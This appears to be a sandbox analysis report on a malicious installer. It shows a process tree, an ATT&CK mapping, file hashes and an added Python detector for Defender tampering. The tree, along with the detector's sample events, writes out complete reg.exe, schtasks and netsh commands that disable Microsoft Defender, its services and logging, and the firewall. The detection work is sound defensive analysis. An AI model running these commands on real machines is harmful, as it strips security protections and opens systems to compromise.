- Command and Scripting Interpreter: PowerShell
PID:6224
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6664
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:7112
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6608
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5116
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
PID:7120
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4492
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4820
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:6004
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:116
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:4680
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1252
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2056
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:6072
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1288
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3004
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:3200
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:7164
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:6164
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:1268
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:2172
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5876
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:6252
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:3292
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:4848
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:5600
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:6484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:5252
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:4804
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:6244
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:6084
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:6272
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:472
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6236
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6328
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6372
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:5244
-
-
-
-
-
C:\Windows\system32\cmd.exe (depth 2)
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
- Suspicious use of WriteProcessMemory
PID:3140

C:\Users\Admin\AppData\Roaming\x69install.exe (depth 3)
C:\Users\Admin\AppData\Roaming\x69install.exe
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1140

C:\Program Files\Mozilla Firefox\firefox.exe (depth 2)
"C:\Program Files\Mozilla Firefox\firefox.exe"
- Executes dropped EXE
PID:4676

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3)
"C:\Program Files\Mozilla Firefox\firefox.exe"
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Checks processor information in registry
- Modifies Control Panel
- Modifies registry class
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3188

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27100 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {21571c9d-3048-4321-9836-e694bf23e461} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
- Executes dropped EXE
PID:2312

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27136 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {0edd748a-82c0-4aca-b2b9-fb787fb13589} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
- Executes dropped EXE
- Checks processor information in registry
PID:3900

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3760 -prefsLen 27277 -prefMapHandle 3764 -prefMapSize 270279 -jsInitHandle 3768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3776 -initialChannelId {d458b5a4-b9bd-41d8-a284-8dc8eb3b2b80} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
- Executes dropped EXE
- Checks processor information in registry
PID:5628

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3924 -prefsLen 27277 -prefMapHandle 3928 -prefMapSize 270279 -ipcHandle 4032 -initialChannelId {505e0550-0c60-4cc2-b67c-36a4c6a346a5} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
- Executes dropped EXE
PID:6048

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4520 -prefsLen 34776 -prefMapHandle 4528 -prefMapSize 270279 -jsInitHandle 4532 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2984 -initialChannelId {90df4ef6-3010-4d3f-9f14-f3f54ece2a3e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
- Executes dropped EXE
- Checks processor information in registry
PID:4800

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5088 -prefsLen 35013 -prefMapHandle 5092 -prefMapSize 270279 -ipcHandle 1504 -initialChannelId {10f2cfd3-048f-4fad-8605-351904c8cf1e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
- Executes dropped EXE
- Checks processor information in registry
PID:6348

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2792 -prefsLen 32952 -prefMapHandle 2788 -prefMapSize 270279 -jsInitHandle 5588 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4964 -initialChannelId {833f46d8-5d08-4bcf-97aa-0ab767e614eb} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
PID:6692

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32952 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5768 -initialChannelId {c52553ae-623b-4cf8-abe0-c9caf8df8d81} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
- Executes dropped EXE
- Checks processor information in registry
PID:6704

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5940 -prefsLen 32952 -prefMapHandle 5944 -prefMapSize 270279 -jsInitHandle 5948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5956 -initialChannelId {814d3c91-a892-4a30-ad0e-fac83d3d0178} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
- Executes dropped EXE
- Checks processor information in registry
PID:6728

C:\Program Files\Mozilla Firefox\firefox.exe (depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2772 -prefsLen 35427 -prefMapHandle 5568 -prefMapSize 270279 -jsInitHandle 4732 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6540 -initialChannelId {fb3dfaa7-d842-4fb9-96c9-1be6c997c09f} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
- Executes dropped EXE
- Checks processor information in registry
PID:6744

C:\Users\Admin\Downloads\TCPView\tcpview64.exe (depth 2)
"C:\Users\Admin\Downloads\TCPView\tcpview64.exe"
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3288

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
PID:3800

C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
PID:4088

C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
PID:4140

C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID:4420

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
PID:5180

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
PID:6108

C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
PID:4016

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- Modifies data under HKEY_USERS
PID:6024

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3660

C:\Windows\system32\SppExtComObj.exe (depth 1)
C:\Windows\system32\SppExtComObj.exe -Embedding
PID:1492

C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
PID:2068

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
PID:4352

C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID:2296

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe (depth 1)
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
PID:3680

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
PID:1148

C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- Checks BIOS information in registry
- Enumerates system info in registry
PID:5964

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
- Drops file in Windows directory
PID:2212

C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
PID:1068

C:\Windows\servicing\TrustedInstaller.exe (depth 1)
C:\Windows\servicing\TrustedInstaller.exe
PID:4780

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
PID:1040

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
PID:3704

C:\Windows\System32\mousocoreworker.exe (depth 1)
C:\Windows\System32\mousocoreworker.exe -Embedding
PID:4432

C:\Windows\System32\smartscreen.exe (depth 1)
C:\Windows\System32\smartscreen.exe -Embedding
PID:980

C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1840

C:\Windows\System32\rundll32.exe (depth 1)
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID:6212

C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
PID:1796

C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
PID:116

C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
PID:3512

C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- Modifies data under HKEY_USERS
PID:7116
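The reg.exe and schtasks.exe burst at depth 5 of the tree above is a complete Defender shutdown in the order an attacker's batch file would run it: policy values under HKLM\Software\Policies\Microsoft\Windows Defender (antivirus, PUA, real-time protection, cloud reporting and sample submission), the DefenderApiLogger and DefenderAuditLogger ETW autologgers, the Defender and ExploitGuard scheduled tasks, the SecurityHealth autorun and EPP shell extensions, and finally the WdBoot, WdFilter, WdNisDrv, WdNisSvc and WinDefend services set to Start=4 (disabled). Whether each write actually took effect depends on Tamper Protection on the victim build; the attempt itself is the loud signal, and that is what the rule below keys on. The Python is an added detection example for this report, not code from the sandbox or from the sample. The event layout ({"pid": ..., "command_line": ...}) is an assumption for the demo rather than a Sysmon or EDR schema, and the sample events are constructed from the command lines in the tree plus one benign control.

```python
"""Classify process-creation command lines for Microsoft Defender tampering.

Added example for this report, not code from the sandbox or the sample. The
event layout ({"pid": int, "command_line": str}) is an assumption for the demo,
not a Sysmon or EDR schema; the sample events are constructed from the
reg.exe / schtasks.exe command lines in the process tree.
"""
from __future__ import annotations

import re
from collections import Counter

_TOKEN = re.compile(r'"[^"]*"|\S+')

# Everything is compared lower-cased, so the casing in the sample is irrelevant.
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
SERVICES_ROOT = "hklm\\system\\currentcontrolset\\services\\"
DEFENDER_SERVICES = {"windefend", "wdnissvc", "wdfilter", "wdboot", "wdnisdrv", "sense"}
DEFENDER_LOGGERS = {"defenderapilogger", "defenderauditlogger"}
DEFENDER_TASK_ROOTS = ("microsoft\\windows\\windows defender\\", "microsoft\\windows\\exploitguard\\")


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def _opt(tokens: list[str], flag: str) -> str | None:
    """Return the argument following a /flag such as /v, /d or /tn (case-insensitive)."""
    low = [t.lower() for t in tokens]
    if flag not in low:
        return None
    i = low.index(flag)
    return tokens[i + 1] if i + 1 < len(tokens) else None


def classify(cmdline: str) -> list[tuple[str, str]]:
    """Return (category, detail) findings for one command line; empty list if benign."""
    toks = tokenize(cmdline)
    if len(toks) < 3:
        return []
    exe = toks[0].lower().rsplit("\\", 1)[-1]      # works for "reg" and "C:\...\reg.exe"
    verb = toks[1].lower()
    findings: list[tuple[str, str]] = []

    if exe in ("reg", "reg.exe") and verb in ("add", "delete"):
        key = toks[2].lower()
        value = _opt(toks, "/v") or ""
        data = _opt(toks, "/d")
        leaf = key.rsplit("\\", 1)[-1]
        if key == DEFENDER_POLICY or key.startswith(DEFENDER_POLICY + "\\"):
            sub = key[len(DEFENDER_POLICY):].strip("\\") or "(root)"
            findings.append(("defender_policy", f"{sub}:{value}={data}"))
        elif key.startswith(SERVICES_ROOT):
            # Start=4 is SERVICE_DISABLED; the sample does this for five Defender services.
            if leaf in DEFENDER_SERVICES and value.lower() == "start" and data == "4":
                findings.append(("defender_service_disabled", leaf))
        elif "\\wmi\\autologger\\" in key and leaf in DEFENDER_LOGGERS and data == "0":
            findings.append(("defender_etw_logger_disabled", leaf))
        elif verb == "delete" and value.lower() == "securityhealth":
            findings.append(("securityhealth_autorun_removed", key))
        elif verb == "delete" and key.endswith("\\shellex\\contextmenuhandlers\\epp"):
            findings.append(("defender_shell_extension_removed", key))

    elif exe in ("schtasks", "schtasks.exe") and verb == "/change":
        task = (_opt(toks, "/tn") or "").lower()
        if "/disable" in (t.lower() for t in toks) and task.startswith(DEFENDER_TASK_ROOTS):
            findings.append(("defender_task_disabled", task))

    return findings


def scan(events: list[dict]) -> dict[int, list[tuple[str, str]]]:
    """Map each PID whose command line tampers with Defender to its findings."""
    hits: dict[int, list[tuple[str, str]]] = {}
    for ev in events:
        found = classify(ev["command_line"])
        if found:
            hits[ev["pid"]] = found
    return hits


def summarize(hits: dict[int, list[tuple[str, str]]]) -> dict[str, int]:
    """Count findings per category across all hits."""
    return dict(Counter(cat for fs in hits.values() for cat, _ in fs))


def is_tamper_burst(hits: dict[int, list[tuple[str, str]]], min_categories: int = 3) -> bool:
    """One category alone shows up in admin scripts; several together is the kill-chain shape."""
    return len(summarize(hits)) >= min_categories


SAMPLE_EVENTS = [  # constructed from the process tree above; pid 9999 is a benign control
    {"pid": 116, "command_line": r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f'},
    {"pid": 1288, "command_line": r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'},
    {"pid": 1268, "command_line": r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f'},
    {"pid": 2172, "command_line": r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'},
    {"pid": 6252, "command_line": r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable'},
    {"pid": 4804, "command_line": r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f'},
    {"pid": 6244, "command_line": r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f'},
    {"pid": 5244, "command_line": r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'},
    {"pid": 9999, "command_line": r'reg add "HKCU\Software\Contoso\App" /v "Theme" /t REG_DWORD /d "1" /f'},
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for pid, fs in hits.items():
        for cat, detail in fs:
            print(f"pid {pid}: {cat} {detail}")
    print("tamper burst:", is_tamper_burst(hits), summarize(hits))
```

Feed it process-creation events (Sysmon Event ID 1 or the EDR equivalent, mapped into the pid/command_line shape) and alert on is_tamper_burst rather than on single hits: a lone SpyNet or SubmitSamplesConsent write is common in hardening scripts, but six categories from sibling PIDs within seconds, as here, is not. The burst is also the moment to pull the parent of those reg.exe processes, which in this tree is the dropped installer, not an admin console.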
Network
MITRE ATT&CK Enterprise v16 (count in parentheses is the number of matching signatures)

Execution
- Command and Scripting Interpreter, T1059 (1): PowerShell, T1059.001 (1)
- Scheduled Task/Job, T1053 (1): Scheduled Task, T1053.005 (1)

Persistence
- Boot or Logon Autostart Execution, T1547 (1): Registry Run Keys / Startup Folder, T1547.001 (1)
- Create or Modify System Process, T1543 (4): Windows Service, T1543.003 (4)
- Event Triggered Execution, T1546 (1): Netsh Helper DLL, T1546.007 (1)
- Scheduled Task/Job, T1053 (1): Scheduled Task, T1053.005 (1)

Privilege Escalation
- Boot or Logon Autostart Execution, T1547 (1): Registry Run Keys / Startup Folder, T1547.001 (1)
- Create or Modify System Process, T1543 (4): Windows Service, T1543.003 (4)
- Event Triggered Execution, T1546 (1): Netsh Helper DLL, T1546.007 (1)
- Scheduled Task/Job, T1053 (1): Scheduled Task, T1053.005 (1)

Defense Evasion
- Impair Defenses, T1562 (4): Disable or Modify System Firewall, T1562.004 (1); Disable or Modify Tools, T1562.001 (2)
- Indicator Removal, T1070 (1): Clear Windows Event Logs, T1070.001 (1)
- Modify Registry, T1112 (6)

Credential Access
- Credentials from Password Stores, T1555 (1): Credentials from Web Browsers, T1555.003 (1)
- Unsecured Credentials, T1552 (1): Credentials In Files, T1552.001 (1)
Downloads
-
Filesize
31KB
MD50e07b883a7ca26cc0812609afc7a7eba
SHA1d2721c6b4d8b0350b60c89a3bbe1ba582a39d244
SHA256093bbea8dfa497fa9229c131aed1ad411def246d223c5a543c48a21102897514
SHA5128d5ce6fb77bf346cee66e424fb613b920bca528518908daccf533d255eb04c2d79d1f4d9a9bfa10189ee2ca9f3dc677715dbd58b8d5e88f55cc3e7d061ff2ed1
-
Filesize
667KB
MD5af7223cf9bf7a64090d631c628eba868
SHA17a3f7927c2539bea7a877e1a966304302a093139
SHA25681a0316cd0efdad79c3f268a0e25a6e7133e9ad6ebf970fe0db36cd4e87ff849
SHA512f33a766daaaf593c22cd3dca277d4a62203280195496e2015ac1e5b7aaade0eb9af67b7f9596c206e04be2aea856b86f70d113ffb9aadeb15517e943daed410c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize330B
MD53d7aabead99f8006f55d29ad5549f4b6
SHA1eb2f886aea6f59f54c263b898eb8d8fb17cd070f
SHA256010451b7bb5644ec1a54c4252b1f2fe4019082f4b6051a03cd06041ea13511bc
SHA5124dedcc3ee523ce2c6fd3303732f8166238535c888ab6a4b6ac0b4c8a64605c07d6db322d06b1eace61618ce9e43218a0c05cdddc78532234135f25259e71275c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5e675c656c722f9c64a956ac246d95797
SHA1cacd8e4a0b6b1e3d4f106e8871539f1b3dc5a00b
SHA256450b4f859a775b541df88980ae5921b87b941ec6507dca22a328b044a8fcd986
SHA51260ab89c6b8858b32d022ce532daf907e6cd30c600374880a846d914305421381057ea9ea04f03203d58199d89d5b529f2d485adc7d54349a0bb46b4495662755
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD59063108404ce873a63f55b85fc0279d7
SHA14f882eed1f0ba768ae3e66e22aca9f5dfac5dfb9
SHA256250e4fa65135df1df0158f86699ff4520f1fd15c61ffab22f7a4cb62198e8d01
SHA5126ec3db7405b3c0530a23904a09ea53c67253048f13d8ea2a427663e7c8269c22166eebd725917935ce9f5441c807f5ab006094fa180b84468fd8743a3b228bb8
-
Filesize
1KB
MD57376b700f02f6a95da86a04f76ee8990
SHA1ac7da7c73065a4e7adc6230926be1137e1670fba
SHA2568a444d17856bc18408c2ba87bcdb6863a3a6479e537e44d71c2be051ecfc7f1a
SHA512ec71afcccf78ec47b7f079b2e6f229109115780314b6d077bbeb852ecccdcd25aff8fc8dd543768ce55f5c9d17b62835f5e42853e849680cdc8c31ed71647bdd
-
Filesize
1KB
MD5d12bf0977e627c7b7f0a3b7592d68397
SHA1b6bb910a4a2c554d9df0de4d691ec4e5e54c36bb
SHA2568256f2f7bfc45a2c3829e2d80e064f23953dcca670fe5a86ec09c822c895dabe
SHA51201367196d606710f73ea36216d57262b4efa612fde0c55e280607076e762f85963f3584b241bc4e67cba7fd53f6a59571378ebd116e5f1a8c824082976c86c7b
-
Filesize
1KB
MD5aa01dbbc36401579da6945a9e8a72351
SHA154ed8a054cee8c8e3157d592b8c485392a3af520
SHA256a84c26ae18d442e614b068e9d8d3ad23a82529a2714b057d7dc6dd36edfb393b
SHA512680f14b0f7d114b408cd2140842eb63f292ce4b0536e5fa1e76fc2704466fcd1f986d02b57cdba2b83980e8d1106330bc48040c0f14a00d8307cef1fd4c2f082
-
Filesize
1KB
MD514ade977d5aee19d8d43a5545fb17aa4
SHA12f09f41411cd31ea761e878ef477a0a15f037823
SHA256313690a5bea10becc948a438d4197abe7d6116e1f36cc094bfe63ac4b76bc704
SHA512f7bf8a2e6a5fe5e4c60873e8e053227f7fdeb46a7336d95ae08b3aefa3e46c4310ac5185903f9854172604b1f1cdfffa7a9aeeea11464adebe6d999f46f999c9
-
Filesize
1KB
